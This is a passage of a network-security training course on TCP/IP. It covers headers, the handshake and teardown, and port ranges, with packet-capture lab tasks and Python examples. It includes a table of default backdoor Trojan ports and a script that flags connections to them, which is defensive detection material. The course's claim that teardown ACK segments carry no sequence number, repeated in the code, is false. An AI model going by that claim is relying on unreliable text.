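def build_tcp_header(sport, dport, seq, ack, flags, window=8192):
    """Encode a minimal header with no options. The checksum is left 0
    because it covers an IP pseudo-header that is outside this example."""
    flag_bits = 0
    for name in flags:
        flag_bits |= FLAG_BITS[name]
    off_flags = (5 << 12) | flag_bits            # 5 x 32-bit words = 20 bytes
    return struct.pack(HEADER_FMT, sport, dport, seq, ack, off_flags, window, 0, 0)


# Constructed sample (not a real capture): a SYN/ACK from port 80 to an
# ephemeral client port, written as the hex you would read off a capture.
SAMPLE_HEX = "0050 c001 00001000 00000011 5012 2000 0000 0000"
SAMPLE = bytes.fromhex(SAMPLE_HEX)

if __name__ == "__main__":
    for field, value in parse_tcp_header(SAMPLE).items():
        print(f"{field:>15}: {value}")
```

Reading the sample by hand checks the decoder: 0x5012 is data offset 5 (20 bytes) with bits 0x10 (ACK) and 0x02 (SYN) set, so this is the second segment of a handshake, with the acknowledgement number 0x11 being the client's ISN plus one.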


Connections

All communication in TCP/IP is done with connections between two hosts. Each connection is opened (or established), data is sent, and the connection is closed (or torn down). These connections have very specific rules they must follow. There are two different states of the open portion of this process: Passive Open and Active Open.

• Passive Open is when a running application tells TCP that it is ready to receive inbound requests via TCP. The application is assuming inbound requests are coming, and is prepared to serve those requests. This is also known as the listening state, as the application is listening for requests to communicate.

• Active Open is when a running application tells TCP to start a communication session with a remote host (which is in Passive Open state). It is possible for two hosts in Active Open to begin communication. It is not a requirement that the remote host be in Passive Open, but that is the most common scenario.

Connection Establishment

In order for the sequence and acknowledgement numbers to have any function, a session between the two hosts must be established. This connection establishment is called the three-way handshake. The three-way handshake involves three distinct steps, which are detailed as follows (please refer to Figure 1-5 when reading this section):

1. Host A sends a segment to Host C with the following:

SYN = 1 (The session is being synchronized.)

ACK = 0 (There is no value in the ACK field, so this flag is a 0.)

Sequence Number = x, where x is a variable. (x is Host A’s ISN.)

Acknowledgement Number = 0

2. Host C receives Host A’s segment and responds to Host A with the following:

SYN = 1 (The session is still being synchronized.)

ACK = 1 (The acknowledgement flag is now set, as there is an ack value in this segment.)

Sequence Number = y, where y is a variable. (y is Host C’s ISN.)

Acknowledgement Number = x + 1 (The sequence number from Host A, plus 1.)

3. Host A receives Host C’s segment and responds to Host C with the following:

SYN = 0 (Session is synchronized with this segment; further requests are not needed.)

ACK = 1 (The ack flag is set in response to the SYN from the previous segment.)

Sequence Number = x + 1 (This is the next sequence number in series.)

Acknowledgement Number = y + 1 (The sequence number from Host C, plus 1.)


At this point, the hosts are synchronized and the session is established in both directions, with data transfer to follow.

Figure 1-5: The three-way handshake.

Connection Termination

In addition to specific steps that are involved in the establishment of a session between two hosts, there are equally specific steps in the termination of the session. There are two methods of ending a session using TCP. One is considered graceful, and the other is non-graceful.

A graceful shutdown happens when one host sends a message (using the FIN flag) to the other, stating it is time to end the session; the other acknowledges; and they both end the session. A non-graceful shutdown happens when one host simply sends a message (using the RESET flag) to the other, indicating the communication has stopped, with no acknowledgements and no further messages sent. In this section, we will investigate the details of the standard graceful termination.

As you saw earlier, it requires three segments to establish a TCP session between two hosts. The other side of the session, the graceful termination, requires four segments. Four segments are required because TCP is a full-duplex communication protocol (meaning data can be flowing in both directions independently). As per the specifications of TCP, either end of a communication can end the session by sending a FIN, which has a sequence number just as a SYN has a sequence number.

Similar to the Active and Passive Opens mentioned earlier, there are also Active and Passive Closes. The host that begins the termination sequence, by sending the first FIN, is the host performing the Active Close. The host that receives the first FIN is the host that is performing the Passive Close. The graceful teardown of a session is detailed as follows (please refer to Figure 1-6 when reading this section):

1. Host A initiates the session termination to Host C with the following:

FIN = 1 (The session is being terminated.)

ACK = 1 (There is an ack number, based on current communication.)

Sequence Number (FIN number) = s (s is a variable based on the current communication.)

Acknowledgement Number = p (p is a variable based on the current communication.)

2. Host C receives Host A’s segment and replies with the following:

FIN = 0 (This segment is not requesting closure of the session.)

ACK = 1 (This segment does contain an ack number.)


Sequence Number = Not Present (As there is no FIN, there is no sequence number required.)

Acknowledgement Number = s + 1 (This is the response to Host A’s FIN.)

3. Host C initiates the session termination in the opposite direction with the following:

FIN = 1 (The session is being terminated.)

ACK = 1 (There is an ack number.)

Sequence Number = p (p is a variable based on the current communication.)

Acknowledgement Number = s + 1 (This is the same as in the previous segment.)

4. Host A receives the segments from Host C and replies with the following:

FIN = 0 (This segment does not request a termination, there is no SYN.)

ACK = 1 (This segment does contain an ack number.)

Sequence Number = Not Present

Acknowledgement Number = p + 1 (This is Host C’s sequence number, plus 1.)

At this point the session has been terminated. Communication in both directions has had a FIN requested and an acknowledgement to the FIN, closing the session.
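The two exchanges, the three-way handshake and the four-segment graceful termination just described, modelled as an added example (not the course's code): each segment carries only the fields the course walks through, the ISNs x and y are constructed values, and a small check confirms the acknowledgement arithmetic the course specifies (the peer's ISN plus one, and only the first two segments carrying SYN). The host state labels are the usual RFC 793 names and are there only to show where each side stands after each segment.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Segment:
    """Just the fields the course walks through; other header fields omitted."""
    src: str
    dst: str
    syn: int = 0
    ack: int = 0
    fin: int = 0
    seq: Optional[int] = None     # None where the course says "Not Present"
    ack_num: int = 0


@dataclass
class Host:
    name: str
    isn: int                      # Initial Sequence Number chosen at open
    state: str = "CLOSED"
    snd_next: int = 0             # next sequence number this host will send
    rcv_next: int = 0             # next sequence number expected from the peer


def three_way_handshake(a: Host, c: Host) -> List[Segment]:
    """Steps 1-3 from the course, with x = a.isn and y = c.isn."""
    x, y = a.isn, c.isn
    a.state = "SYN_SENT"
    s1 = Segment(a.name, c.name, syn=1, ack=0, seq=x, ack_num=0)
    c.state = "SYN_RECEIVED"
    s2 = Segment(c.name, a.name, syn=1, ack=1, seq=y, ack_num=x + 1)
    s3 = Segment(a.name, c.name, syn=0, ack=1, seq=x + 1, ack_num=y + 1)
    a.state = c.state = "ESTABLISHED"
    a.snd_next, a.rcv_next = x + 1, y + 1
    c.snd_next, c.rcv_next = y + 1, x + 1
    return [s1, s2, s3]


def graceful_close(a: Host, c: Host) -> List[Segment]:
    """Steps 1-4 of the FIN exchange, Host A performing the Active Close
    (s = A's current sequence number, p = C's)."""
    s, p = a.snd_next, c.snd_next
    f1 = Segment(a.name, c.name, fin=1, ack=1, seq=s, ack_num=p)
    a.state = "FIN_WAIT"
    f2 = Segment(c.name, a.name, fin=0, ack=1, seq=None, ack_num=s + 1)
    c.state = "CLOSE_WAIT"
    f3 = Segment(c.name, a.name, fin=1, ack=1, seq=p, ack_num=s + 1)
    f4 = Segment(a.name, c.name, fin=0, ack=1, seq=None, ack_num=p + 1)
    a.state = c.state = "CLOSED"
    return [f1, f2, f3, f4]


def is_valid_handshake(segs: List[Segment]) -> bool:
    """Check the arithmetic the course specifies: each side acknowledges
    the other's ISN plus one, and only the first two segments carry SYN."""
    if len(segs) != 3:
        return False
    s1, s2, s3 = segs
    return (s1.syn == 1 and s1.ack == 0
            and s2.syn == 1 and s2.ack == 1 and s2.ack_num == s1.seq + 1
            and s3.syn == 0 and s3.ack == 1
            and s3.seq == s1.seq + 1 and s3.ack_num == s2.seq + 1)


def run_session(x=1000, y=5000):
    """Open with the handshake, then tear down gracefully (constructed ISNs)."""
    a, c = Host("Host A", x), Host("Host C", y)
    return a, c, three_way_handshake(a, c), graceful_close(a, c)


if __name__ == "__main__":
    a, c, opened, closed = run_session()
    for seg in opened + closed:
        flags = "".join(n for n, v in (("S", seg.syn), ("A", seg.ack), ("F", seg.fin)) if v)
        print(f"{seg.src} -> {seg.dst}: [{flags}] seq={seg.seq} ack={seg.ack_num}")
    print(a.state, c.state)
```

A half-open connection, the state a listener is left in when the third segment never arrives, is exactly what `is_valid_handshake` rejects when given only the first two segments; that is the condition a SYN-flood monitor counts.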

Figure 1-6: Connection termination.

Ports

You have been introduced to the fact that IP deals with addressing and the sending/receiving of data between two hosts, and you have been introduced to the fact that TCP can be selected to provide reliable delivery of data. However, if a client sends a request to a server that is running many services, such as WWW, NNTP, SMTP, and FTP, how does the server know which application is supposed to receive the request? The answer is by specifying ports.


Port numbers are located in the TCP or UDP header, and they are 16-bit values, ranging from 0 to 65535. Port numbers can be assigned to specific functions or applications. Ports can also be left open for dynamic use by two hosts during communication. There are ranges of ports for each function. There are three main categories of ports: well-known, registered, and dynamic.

• The well-known ports (also called reserved ports by some) are those in the range of 0 to 1023. These port numbers are assigned to specific applications and need to remain constant for the primary services of the Internet to continue to provide the flexibility and usefulness it does today. For example, the WWW service is port 80, the Telnet service is port 23, the SMTP service is port 25, and so on. The well-known port list is maintained by the Internet Assigned Numbers Authority (IANA), and can be found here: www.iana.org/assignments/port-numbers.

• Registered ports are those in the range of 1024 to 49151. These port numbers can be registered to a specific function, but are not defined or controlled by a governing body, so multiple functions could end up using the same port.

• Dynamic ports (also called private ports) are those from 49152 to 65535. Any user of the Internet can use dynamic ports.

When a client connects to a server and requests a resource, that client also requires a port. The client ports (also called ephemeral ports by some) are used by a client during one specific connection; each subsequent connection will use a different port number. These ports are not assigned to any default service, and are usually a number greater than 1023. There is no defined range for client ports; they can cover the numbers of both the registered and dynamic port ranges. When a client begins a session by requesting a service from a server, such as the WWW service on port 80, the client uses an ephemeral port on the client side. This enables the server to respond to the client. Data is then exchanged between the two hosts using the port numbers established for that session: 80 on the server side, and a dynamic number greater than 1023 on the client side. The combination of the IP address and port is often referred to as a socket, and the two hosts together are using a socket pair to communicate for this session.

The following table lists some of the well-known ports and their associated services.

Some Well-known Ports and their Services

Port        Service
23          Telnet
80          HTTP (Standard Web pages)
443         Secure HTTP (Secure Web pages)
20 and 21   FTP (Data and control)
53          DNS
25          SMTP
119         NNTP


In addition to known valid services, such as those listed previously, there are many Trojan Horse programs that use specific ports (although the port can usually be changed).

Ports Associated with Trojan Horses

Port Number    Name of Trojan Horse
12345          NetBus
1243           Sub Seven
27374          Sub Seven 2.1
31337          Back Orifice
54320 (TCP)    Back Orifice 2000 (BO2K)
54321 (UDP)    Back Orifice 2000 (BO2K)
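Port classification and a first-pass check of connection records against the listed Trojan Horse ports, as an added example that is not from the course: the two tables are the ones above (the course gives a protocol only for the two BO2K entries, so the other entries match either protocol), the log line format is a constructed, hypothetical one rather than any real tool's output, and the sample records are made up with classroom-style addresses. As the course notes, these ports can be changed, so a match is a lead to investigate with a packet capture, not evidence of compromise.

```python
import re

# Tables from the course: well-known ports it lists, and the default ports
# of the Trojan Horse programs it names (protocol given only for BO2K).
WELL_KNOWN = {20: "FTP (data)", 21: "FTP (control)", 23: "Telnet", 25: "SMTP",
              53: "DNS", 80: "HTTP", 119: "NNTP", 443: "HTTPS"}
TROJAN_PORTS = {12345: ("NetBus", None), 1243: ("Sub Seven", None),
                27374: ("Sub Seven 2.1", None), 31337: ("Back Orifice", None),
                54320: ("Back Orifice 2000 (BO2K)", "tcp"),
                54321: ("Back Orifice 2000 (BO2K)", "udp")}


def port_category(port):
    """IANA ranges as the course states them."""
    if not 0 <= port <= 65535:
        raise ValueError("port numbers are 16-bit values, 0 to 65535")
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "dynamic"


# Assumed, constructed record format (hypothetical; not any real tool's):
#   <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>
LOG_RE = re.compile(
    r"^(?P<proto>tcp|udp)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)")


def parse_socket_pair(line):
    """Return the socket pair (client socket, server socket) or None if the
    line does not match the assumed format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {"proto": m["proto"],
            "client": (m["src"], int(m["sport"])),
            "server": (m["dst"], int(m["dport"]))}


def flag_trojan_ports(lines):
    """One finding per connection whose destination port matches a listed
    Trojan port (and protocol, where the course specifies one)."""
    findings = []
    for line in lines:
        pair = parse_socket_pair(line)
        if pair is None:
            continue
        dport = pair["server"][1]
        if dport not in TROJAN_PORTS:
            continue
        name, proto = TROJAN_PORTS[dport]
        if proto is None or proto == pair["proto"]:
            findings.append({"name": name, "port": dport,
                             "client_port_category": port_category(pair["client"][1]),
                             "socket_pair": (pair["client"], pair["server"])})
    return findings


# Constructed sample connection records (classroom-style addresses, not real traffic).
SAMPLE_LOG = [
    "tcp 172.16.10.5:49201 -> 172.16.10.9:80",
    "tcp 172.16.10.5:49202 -> 172.18.10.7:12345",
    "udp 172.16.10.6:53000 -> 172.18.10.7:54321",
    "tcp 172.16.10.6:53001 -> 172.18.10.7:54321",
    "tcp 172.16.10.8:1050 -> 172.16.10.9:25",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for f in flag_trojan_ports(SAMPLE_LOG):
        print(f"{f['name']} on port {f['port']}: {f['socket_pair']}")
```

Note the fourth sample record: TCP to 54321 is not flagged, because the course lists 54321 for BO2K over UDP only. Whether that is the behaviour you want depends on how much you trust the table; tightening or loosening the protocol match is a one-line change in TROJAN_PORTS.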

Network Monitor

There is a very valuable tool available with Windows called Network Monitor. This tool allows for full packet capture and lets the analyst (you) peer into the packet’s contents, examining both the payload, or data, and the headers, in detail. You can see any set flags, the sequence and acknowledgement numbers, packet size, and more. The following is a discussion on the use of Network Monitor, provided as background for you to be able to perform the tasks in this lesson.

Some of the things you can do with Network Monitor are:

• Monitor real-time network traffic.

• Analyze network traffic.

• Filter specific protocols to capture.

In this lesson, you will be focusing on the capture and analysis of IP packets, and on the details of the protocol suite.

Trojan Horse: An apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data.


Figure 1-7: The default view of Network Monitor, showing the various panes.

In Figure 1-7, you can see the default view of Network Monitor. In this view, the screen is split into several sections.

The top bar is the standard menu bar found in Microsoft programs. The basic functions on the toolbar that you will use in this lesson are contained in the File and Capture menus.

• The File menu contains three commands: Open, Save As, and Exit.

— Choose Open to open a previously saved Network Monitor capture.

— Choose Save As to save a Network Monitor capture.

— Choose Exit to exit.

• The Capture menu has more commands: Start, Stop, Stop And View, Pause, and Continue.

— The Start, Pause, and Continue commands are self-explanatory.

— The difference between Stop and Stop And View is that the Stop command ends the capture. The Stop And View command ends the capture and switches Network Monitor to its next mode, Display View.

The other sections of the Capture View are panes (windows in a window) called Graph, Session Stats, Station Stats, and Total Stats.

• The Graph pane provides five bars that measure percentages of pre-defined metrics.

— The top graph indicates the percentage (%) of network utilization, meaning how much the network is being used.

— The second graph indicates the number of frames per second, meaning frames transmitted per second over the network.

— The third graph indicates the number of bytes per second that are transmitted over the network.


— The fourth graph indicates the number of broadcasts per second that are transmitted over the network.

— The fifth graph indicates the number of multicasts per second that are transmitted over the network.

While a capture is running, these graphs work in realtime, providing current data.

• The next pane is the Session Stats pane. In this pane, you can see the sessions that are taking place during the capture.

• Following the Session Stats is the Station Stats pane. In this pane, you can see statistics per interface on the host, per broadcast, per multicast, and more.

• The final pane in this view is the Total Stats pane. The Total Stats pane is subdivided into sections: Network Statistics, Captured Statistics, Per Second Statistics, Network Card (MAC) Statistics, and Network Card (MAC) Error Statistics. From this pane, you can identify frames, broadcasts, multicasts, network utilization, errors, and more, all in realtime during the capture.

Displaying Captures

After you have captured network traffic, you can begin your analysis, which requires a different view of Network Monitor. You will need to use the Display View. You can switch to the Display View by either using the Capture→Stop And View command or by using the Display Captured Data command after a capture session has been stopped.

Figure 1-8: The Summary View of Network Monitor.

When you first open the Summary View, as shown in Figure 1-8, you will see a timeline of packets captured. By double-clicking any packet that was captured, you can look into its details and bring up the next view of Network Monitor. Once you have selected a packet, Network Monitor displays three panes for presenting information to you.


Figure 1-9: The details of a packet in Network Monitor.

The top pane shown in Figure 1-9 is the Summary pane. This pane provides the basic details of a packet, such as:

• Frame number

• Time the packet was captured

• Destination and source MAC addresses

• Protocol used

• Destination and source IP addresses

The middle pane shown in Figure 1-9 is the Detail pane. This pane provides the actual details of the protocol for the selected packet. Any line that has a plus sign next to it can be expanded for further detail.

The bottom pane in Figure 1-9 is the Hex pane. This pane provides the actual Hex value for the raw data that each frame is comprised of. When you select something in the Detail pane, it is highlighted in the Hex pane for comparison. Also, in this pane, the ASCII characters are visible. In the event that cleartext is captured, this is where it will be readable.

Network Monitor Filters

Because Network Monitor has the ability to capture all network traffic, it would be very easy to capture too much information and have difficulty in finding what you were looking for. This is where filtering comes into play. There are two types of filters available in Network Monitor: capture filters and display filters. For example, if you wanted to capture only TCP messages, you could create a capture filter so that only TCP messages are captured. If you wanted to view only ICMP messages, you could create a display filter so that all you see are ICMP messages. Figure 1-10 and Figure 1-11 show the dialog boxes used for each filter type.


To create or use filters, choose Capture→Filter. Using filters not only makes it easier for you, as an analyst, to find what you are looking for, but also keeps the buffer that stores the capture from filling up with useless information.

Figure 1-10: Network Monitor’s Capture Filter dialog box.

Figure 1-11 shows the Display Filter dialog box.

Figure 1-11: Network Monitor’s Display Filter dialog box.


When using filtering, you will likely use either protocol or address filtering. With protocol filtering, you identify a specific protocol to work with. With address filtering, you again define the specific address to filter. Filters can be implemented in different directions, either traffic into this host, outbound from this host, or in both directions. These options are implemented by selecting the appropriate arrow (one of these three: --->, ---<, or <-->) for the function you want to perform.

TASK 1B-1
Using Network Monitor

1. Open a command prompt, and enter ipconfig /all.

If you are on the LEFT side of the classroom, your IP addresses will be 172.16.10.x (for the network card connected to the classroom hub) and 172.26.10.x (for the network card connected to your partner’s computer via a crossover cable). If you are on the RIGHT side of the classroom, your IP addresses will be 172.18.10.x (for the network card connected to the classroom hub) and 172.28.10.x (for the network card connected to your partner’s computer via a crossover cable).

2. Record the MAC and IP addresses for the two network cards in your computer.

MAC address    Each card will have a unique MAC address.
IP address     Each card will have a unique IP address.
MAC address    Each card will have a unique MAC address.
IP address     Each card will have a unique IP address.

3. Close the Command Prompt window.

4. Open Network Monitor. (From the Start menu, choose Programs→Administrative Tools→Network Monitor.)

When you run Network Monitor the first time on a multi-homed computer, you might receive the following pop-up warning, or one similar to it.

5. If you see the Select Default Network message box, click OK to display the Select A Network dialog box. Expand the + sign next to Local Computer, select the interface with the MAC address associated with the Classroom Hub interface, and click OK.

6. Choose Capture→Start, or press the F10 key to start a capture.


7. If you are on the LEFT side of the classroom, ping the IP address 172.16.0.1. If you are on the RIGHT side of the classroom, ping the IP address 172.18.0.1. This will create network traffic for you to capture.

8. Wait for 30 to 40 seconds. As you wait, watch the realtime statistics change in the Network Monitor Capture window.

9. Choose Capture→Stop And View. You should now see the Display View, including the timeline of the packets captured.

10. Double-click any packet to change to the Detail View.

11. Observe the structure of the three panes in this view, and expand any + signs displayed in the middle pane.

12. Choose Display→Filter.

13. Select Protocol==Any, and click the Edit Expression button.

14. With the Protocol tab selected, click the Disable All button.

15. Scroll down to ICMP, select ICMP, and click the Enable button. The Expression field at the top of the dialog box should now display Protocol == ICMP. Click OK.

16. Click OK to implement this filter on your capture.

17. Observe that only ICMP frames are visible in your window now.

18. Choose File→Save As, and save the capture as First_Capture.cap, in the default location.

19. Close Network Monitor.

Ethereal

Another product that you can use to capture data is called Ethereal. With Ethereal, data can be captured off the wire or read from a captured file. Data can also be saved to a file in a format that Microsoft’s Network Monitor can understand. The current version of Ethereal (0.9.11) can analyze over 300 Data Link, Network, Transport, and Application layer protocols.

To perform promiscuous mode captures on a Windows machine, you have to first download and install the latest version of WinPcap (at least WinPcap 2.3); do not install any alpha or beta versions. WinPcap is the Windows equivalent of libpcap (LIBrary for Packet CAPtures) for Linux. It can be obtained at http://winpcap.polito.it. In fact, you will use WinPcap later in the course, along with other tools such as windump, tcpdump, nmap, and snort.

If you need to download Ethereal, be sure to get at least version 0.9.11. It can be obtained at www.ethereal.com.

promiscuous mode: Normally an Ethernet interface reads all address information and accepts follow-on packets only destined for itself, but when the interface is in promiscuous mode, it reads all information (sniffer), regardless of its destination.

28 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 82: SCNP Hardening

TASK 1B-2
Installing and Starting Ethereal

1. Create a folder called Ethereal at the root of your Windows 2000 boot partition (for example, C:\).

2. Copy the files WinPcap_2_3.exe and ethereal-setup-0.9.11.exe to this folder. Your instructor will tell you where to obtain these files.

3. Double-click WinPcap_2_3.exe, accept all defaults, including agreeing to the licensing agreement, and wait for the install to complete.

4. Double-click ethereal-setup-0.9.11.exe, agree to the licensing agreement, leave all options set to the defaults, including the default installation folder. When the install is done, click Close.

5. Once it has been installed, to run Ethereal, double-click the icon for Ethereal on the desktop, or choose (from the Start menu) Programs→Ethereal→Ethereal.

Ethereal Overview

When you first start Ethereal, you will see a GUI with three panes. The top pane lists the captured frames in sequence. When you highlight a frame, the middle pane provides protocol layer information about that frame, and the bottom pane shows the details of the frame in both Hex and ASCII values.

Figure 1-12: The Ethereal GUI.

Above the top frame there is a menu bar, with File, Edit, Capture, Display, and Tools menus towards the left side, and at the right corner there’s a Help menu. Below the bottom frame, you will see four buttons: the Filter button, a drop-down bar, the Reset button, and the Apply button.

When you want to start a capture, navigate to the menu at the top and choose Capture→Start. You can also start a capture with the Ctrl+K key combination. When you do so, you will see a dialog box asking you to specify the following:

• The interface to capture from.

• Whether you want to limit a capture to a particular size.

• Whether you want to capture packets in promiscuous mode (you will need WinPcap to do so).

• Any capture filters you want to apply.

• The name of the file you want to save your captures to (you can do this later as well).

• Whether you want to view the captures as they are being captured (via windump).

• Parameters defining when the captures should be stopped.

• Whether you want to enable or disable name resolution at the Data Link, Network, and Transport layers.

Figure 1-13: Ethereal’s Capture Options dialog box.

When you click OK, capture will start on the selected network interface and you will see another pop-up informing you of that. Ethereal will continue with the capture until you click the Stop button.

Figure 1-14: Ethereal pop-up displaying capture information.

After you stop a capture, you can view it. Then when you are done and want to save the capture for future reference:

1. Choose File→Save or File→Save As.

2. Provide the location to the folder where you want to save the file.

3. Click File Type and specify the output format.

4. Click OK to save the file.

Figure 1-15: The many Save As options in Ethereal.

Notice how many choices you have for saving a capture—you can save to Network Monitor’s format if you want. (Conversely, Ethereal will read a capture saved by any of the protocol analyzers in the list.) When you are done with capture and analysis and want to close the program, choose File→Quit or press Ctrl+Q.

TASK 1B-3
Using Ethereal

Setup: Ethereal has been successfully installed and is running on your computer.

1. Choose Capture→Start to display the Capture Options dialog box.

2. Observe the list of network interfaces displayed in the Capture Options dialog box. The network interfaces are listed differently than in Network Monitor.

3. Select the network interface you want to perform the capture on. In this case, you would select the Classroom Hub interface.

To make sure you know which interface is the right one, start Regedit, and navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, which displays network interfaces with Hex values (the same way Ethereal lists them). Select an interface, and look for the string value IPAddress. Find the interface whose IP address is 172.16.10.x (if you are seated on the LEFT side of the class) or 172.18.10.x (if you are seated on the RIGHT side). Jot down the first few Hex characters (just enough to uniquely identify the interface), close Regedit, switch back to Ethereal, and select the network adapter whose Hex values match the characters you recorded.

If necessary, adjust the screen resolution so that you can access the OK button at the bottom of the Capture Options dialog box.

4. Verify that you have selected Promiscuous mode capture.

5. Click OK.

6. Ping your router’s IP address.

7. Click Stop to stop and view the capture.

8. Double-click any frame where your computer is the source, the router is the destination, and the protocol is ICMP.

9. View the frame details.

10. Verify that you can relate to these captures in much the same way as your earlier Network Monitor captures.

11. Close Ethereal.

TCP Connections

Earlier, you were introduced to the function of and the process of control flags, the three-way handshake, and the session teardown. In this section, you are going to use Network Monitor to view the three-way handshake, packet by packet, and to view the teardown, packet by packet.

Remember, the three-way handshake is used by two hosts when they are creating a session. The first host begins by sending out a packet with the SYN flag set, and no other flags. The second packet is a response with both the SYN and ACK flags set. The third part of the session establishment will have the ACK flag set.

TASK 1B-4
Analyzing the Three-way Handshake

1. Open Network Monitor, and start a capture.

2. At a command prompt:

If you are on the LEFT side of the classroom, enter telnet 172.16.0.1.

If you are on the RIGHT side of the classroom, enter telnet 172.18.0.1.

3. When you are presented with a logon prompt for User Access Verification, press Enter repeatedly until your screen resembles the following graphic.

Minimize the Command Prompt window.

4. Switch back to Network Monitor, and choose Capture→Stop And View.

5. In the Summary pane, identify the frames that are involved in the three-way handshake.

6. Once you have identified the frames that are part of the three-way handshake, based on the discussion, look for the following:

a. In the first frame, what are the SEQ number, ACK number, and flags?

b. In the second frame, what are the SEQ number, ACK number, and flags?

c. In the third frame, what are the SEQ number, ACK number, and flags?

7. Expand each of the three frames in the handshake, and examine them in greater detail in the Detail pane.

8. Using the Hex pane, identify the value for the flags that are set for each frame.

9. Leave Network Monitor open, along with this capture, for the next task.

The Session Teardown Process

Previously, you examined the session teardown process. Here, you will examine the details of the session teardown. Remember, there are four parts of session teardown.

TASK 1B-5
Analyzing the Session Teardown Process

Setup: Network Monitor is running, and the last capture you performed is displayed.

1. In the Summary pane, identify the frames that are involved in the session teardown.

2. Once you have identified the frames, examine them in greater detail in the Detail pane.

3. In each frame, identify at least the following:

a. Flags that are set.

b. Sequence number.

c. Acknowledgement number.

4. Save the capture as tcp_connections.cap and close the capture.

5. Minimize Network Monitor.

Topic 1C
Capturing and Identifying IP Datagrams

Along with TCP, the protocol you will spend the most time analyzing will be IP. This protocol is the one that does the most work of the entire TCP/IP suite. In Figure 1-16, you can see the actual format of the IP datagram. There are seven rows of information in the figure, with the critical rows being the first five. When a computer receives an IP datagram, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.

To work with IP further, refer to RFC 791.

IP Datagram, with All Fields Shown

Figure 1-16: An IP datagram with all fields shown.

Using Figure 1-16, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze the IP header.

• Starting on Row One, on the left side is a field called Version. This is a 4-bit field that defines the version of IP that is currently running. Right now, this will likely be a value of 4, as that is the current industry standard—IPv4, or IP version 4. Some instances may be using IP version 6, or IPv6, which you will examine later in the course.

• Moving to the right of the Version is a field called Header Length (IHL). This is a 4-bit field that defines the number of 32-bit words in the header itself, including options. In most captures, this value will be 5, for no options set, the normal value.

• Continuing to the right of Header Length is a field called Type Of Service. This is an 8-bit field that defines the quality of service for this packet. Different applications may require different needs of available bandwidth, and type of service is one way of addressing those needs.

• The last field on Row One is the field called Total Length. This is a 16-bit field that defines the length of the entire IP datagram in bytes.

• Starting on Row Two, on the left side is a field called Identification. This is a 16-bit field that defines each datagram sent by the host. The standard for this field is for the identification value to increment by one for every datagram sent.

• Following the Identification field is a field called Flags. Not to be confused with the flags of TCP, which you have seen, this is a 3-bit field that is used in conjunction with fragmentation. The first of the three bits is to be set at 0, as a default. The next bit is known as the DF bit, or Don’t Fragment. The third bit is known as the MF bit, or More Fragment.

• The last field on Row Two is a field called Fragment Offset. This is a 13-bit field that is used to define where in the datagram this fragment belongs. (If there is fragmentation, the first fragment will have an offset of 0.)

• Starting on Row Three, on the left side, is a field called Time To Live. This is an 8-bit field that is used to define the maximum amount of time this datagram may be allowed to exist in the network. The TTL is created by the sender and lowers by 1 for every router that the datagram crosses. If the TTL reaches 0, the packet is to be discarded.

• Moving to the right is a field called Protocol. This is an 8-bit field that is used to define the upper-layer protocol that is in use for this datagram. There are many unique protocol numbers, and if you wish to study all of the numbers, please refer to RFC 790. However, the following list identifies several important Protocol ID numbers:

— Protocol ID Number 1: ICMP

— Protocol ID Number 6: TCP

— Protocol ID Number 17: UDP

• The final field on Row Three is a field called Header Checksum. This is a 16-bit field that is used to provide a check on the IP header only; this is not a checksum for any data following the header. This checksum provides integrity for the header itself.

• The Fourth Row is a single field, the Source IP Address. This field is a 32-bit value that identifies the IP address of the source host of this packet.

• The Fifth Row is also a single field, the Destination IP Address. This field is a 32-bit value that identifies the IP address of the destination host for this packet.

• The Sixth Row contains any options that may be present. This is a variable, with no absolute fixed size to the options. Some of the options that may be in this field are those that are related to routing or timekeeping. If options are used, there will be padding added so this field equals 32 bits in size.

• The Seventh and final Row is the representation of the data. By this point, the header is complete and the data the user wishes to send or receive is stored in the packet.

TASK 1C-1
Capturing and Identifying IP Datagrams

Setup: You are logged on to Windows 2000 as Administrator. A command prompt and Network Monitor are running.

1. If necessary, enable the FTP service.

2. In Network Monitor, start a capture, and leave this running.

3. At the command prompt, enter ftp ip_address, where ip_address is the address of a neighboring computer.

integrity: Assuring information will not be accidentally or maliciously altered or destroyed.

4. Log on as Anonymous.

5. After you are logged on, enter quit to end the FTP session.

6. Back in Network Monitor, choose Capture→Stop And View to view the captured frames.

7. Observe the Protocol column. We are interested only in the TCP and FTP frames. Apply a filter to show only TCP and FTP, and then double-click any FTP frame. For the specific steps to add filters, see Task 1B-1, step 12 through step 16.

8. Examine the IP header, compared to the discussion. Look for the following:

a. Version Number

b. Time To Live

c. Protocol ID

d. Source Address

e. Destination Address

9. Once you are done examining the IP header, save the capture as IP_Header.cap and close the capture.

Topic 1D
Capturing and Identifying ICMP Messages

When you are analyzing protocols, it should become immediately apparent that there are differences between ICMP and the other protocols discussed in this lesson. There is a similar concept in that the ICMP message is encapsulated in the IP datagram, just as you saw with TCP and UDP. In Figure 1-17, you can see the actual format of the ICMP message. There are only two rows of information shown in the figure.

Figure 1-17: An ICMP message with all fields shown.

To work with ICMP further, refer to RFC 792.

ICMP Message, with All Fields Shown

Using Figure 1-17, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze an ICMP message.

• Starting on Row One, on the left side, the first field is called Type. This is an 8-bit value that identifies the specific ICMP message. For example, a Type could be 3, which is a type of unreachable message.

• Following Type on Row One is a field called Code. This is an 8-bit value that works in conjunction with Type to define the specific details of the ICMP message. For example, using Type 3, the Code could be 1, which is destination host unreachable.

• Moving along on Row One, the final field is called Checksum. This is a 16-bit value that checks the integrity of the entire ICMP message.

• The Second Row has no fixed fields. Depending on the Type and Code of the ICMP message, this field may contain many things. One example of what may go in this field is timestamping of messages.
